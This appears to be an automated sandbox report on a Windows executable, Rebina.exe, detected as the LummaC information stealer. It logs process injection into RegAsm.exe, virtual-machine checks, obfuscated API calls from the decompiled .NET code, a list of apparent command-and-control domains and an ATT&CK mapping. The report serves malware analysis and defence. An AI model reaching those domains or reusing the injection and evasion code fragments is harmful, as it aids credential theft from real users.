Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041B5D0	4_2_0041B5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004245D0	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041EDF3	4_2_0041EDF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00401D90	4_2_00401D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040E616	4_2_0040E616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040D6AB	4_2_0040D6AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040CF00	4_2_0040CF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00419F16	4_2_00419F16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00405F20	4_2_00405F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004087D0	4_2_004087D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041DF97	4_2_0041DF97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00409990 appears 121 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004092A0 appears 35 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1624

Source: Rebina.exe, 00000000.00000002.2065241639.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Rebina.exe
Source: Rebina.exe, 00000000.00000000.2062777864.00000000006CA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVQP.exeH vs Rebina.exe
Source: Rebina.exe	Binary or memory string: OriginalFilenameVQP.exeH vs Rebina.exe

Source: Rebina.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Rebina.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/6@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0042AC4C CoCreateInstance,

4_2_0042AC4C

Source: C:\Users\user\Desktop\Rebina.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Rebina.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Rebina.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5232
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0e27efbd-8f13-43d4-9bb1-3ed99251db98

Jump to behavior

Source: Rebina.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Rebina.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Rebina.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Rebina.exe

Virustotal: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\Rebina.exe "C:\Users\user\Desktop\Rebina.exe"
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1624
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Rebina.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Rebina.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Rebina.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Rebina.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\388fm14yqlq\obj\Release\doX.pdb source: Rebina.exe
Source:	Binary string: c:\388fm14yqlq\obj\Release\doX.pdbP source: Rebina.exe

Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E108E0 push ss; retf	0_2_00E108E2
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E10568 push ebx; retf	0_2_00E10572
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E10558 push ebx; retf	0_2_00E10562
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E108D8 push ss; retf	0_2_00E108DA
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E11135 push ebx; retf	0_2_00E11136
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E10EB7 push edx; retf	0_2_00E11076
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E112BB push ebx; retf	0_2_00E112BE
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E10588 push ebp; retf	0_2_00E10592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00440760 push ecx; retf	4_2_00440761

Source: Rebina.exe

Static PE information: section name: .text entropy: 7.994595123284687

Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Rebina.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Memory allocated: 10F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Rebina.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Rebina.exe TID: 6204	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5680	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Rebina.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001046000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW^
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_4-12439

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_004358B0 LdrInitializeThunk,

4_2_004358B0

Source: C:\Users\user\Desktop\Rebina.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Rebina.exe, Program.cs	Reference to suspicious API methods: InterfaceLoader.VirtualProtectEx(uint.MaxValue, ref AIOsncoiuuA[0], AIOsncoiuuA.Length, 64u, ref old)
Source: Rebina.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("us" + "ER32.Dcc".Replace('c', 'l').ToLower()), @string)
Source: Rebina.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("us" + "ER32.Dcc".Replace('c', 'l').ToLower()), @string)
Source: Rebina.exe, Program.cs	Reference to suspicious API methods: InterfaceLoader.CreateRemoteThread(uint.MaxValue, 0u, 0u, ref AIOsncoiuuA[num40], MoveAngles.userBuffer, 0, ref QoewnxZjAbqui)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Rebina.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Rebina.exe

Code function: 0_2_02AC249D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_02AC249D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Rebina.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: Rebina.exe, 00000000.00000002.2065522188.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: assumptionflattyou.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Rebina.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A06008	Jump to behavior

Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Rebina.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Rebina.exe

Queries volume information: C:\Users\user\Desktop\Rebina.exe VolumeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Rebina.exe, 00000000.00000002.2065241639.0000000000E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Rebina.exe, 00000000.00000002.2065241639.0000000000E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
